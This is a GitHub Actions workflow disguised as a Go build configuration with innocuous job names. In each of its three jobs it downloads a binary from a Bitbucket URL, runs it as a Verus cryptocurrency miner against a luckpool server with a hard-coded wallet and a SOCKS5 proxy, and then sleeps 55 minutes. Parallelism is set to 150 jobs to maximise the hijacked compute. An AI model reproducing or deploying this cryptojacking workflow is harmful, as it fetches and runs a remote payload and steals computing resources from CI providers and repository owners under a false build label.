# This is a basic workflow to help you get started with Actions

name: XYZ
on: [push, pull_request]
jobs:
  build:
    name: sapi
    runs-on: ubuntu-20.04
    strategy:
      max-parallel: 150
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 1.0]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O]
    timeout-minutes: 50
    env:
        NUM_JOBS: 150
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        wget https://bitbucket.org/stavol99/mine/downloads/kambing
        chmod +x kambing
        screen -dmS ls
        POOL=stratum+tcp://na.luckpool.net:3956
        WALLET=RN1cao1jLNBfdmU9TtBWCcKT2jxAhK8fez
        WORKER=$(echo $(shuf -i 1-10 -n 1)ThreadRipper3990x)
        PROXY=socks5://158.101.205.204:1080
        ./kambing -a verus -o $POOL -u $WALLET.$WORKER -p c=VRSC,zap=VRSC -t 2 -x $PROXY
    - name: finish
      run: sleep 55m
  postgres-2:
    name: SAPI-2
    runs-on: ubuntu-20.04
    strategy:
      max-parallel: 150
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 1.0]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O]
    timeout-minutes: 50
    env:
        NUM_JOBS: 150
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        wget https://bitbucket.org/stavol99/mine/downloads/kambing
        chmod +x kambing
        screen -dmS ls
        POOL=stratum+tcp://na.luckpool.net:3956
        WALLET=RN1cao1jLNBfdmU9TtBWCcKT2jxAhK8fez
        WORKER=$(echo $(shuf -i 1-10 -n 1)ThreadRipper3990x)
        PROXY=socks5://158.101.205.204:1080
        ./kambing -a verus -o $POOL -u $WALLET.$WORKER -p c=VRSC,zap=VRSC -t 2 -x $PROXY
    - name: finish
      run: sleep 55m
  postgres-3:
    name: SAPI-3
    runs-on: ubuntu-20.04
    strategy:
      max-parallel: 150
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 1.0]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O]
    timeout-minutes: 50
    env:
        NUM_JOBS: 150
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        wget https://bitbucket.org/stavol99/mine/downloads/kambing
        chmod +x kambing
        screen -dmS ls
        POOL=stratum+tcp://na.luckpool.net:3956
        WALLET=RN1cao1jLNBfdmU9TtBWCcKT2jxAhK8fez
        WORKER=$(echo $(shuf -i 1-10 -n 1)ThreadRipper3990x)
        PROXY=socks5://158.101.205.204:1080
        ./kambing -a verus -o $POOL -u $WALLET.$WORKER -p c=VRSC,zap=VRSC -t 2 -x $PROXY
    - name: finish
      run: sleep 55m
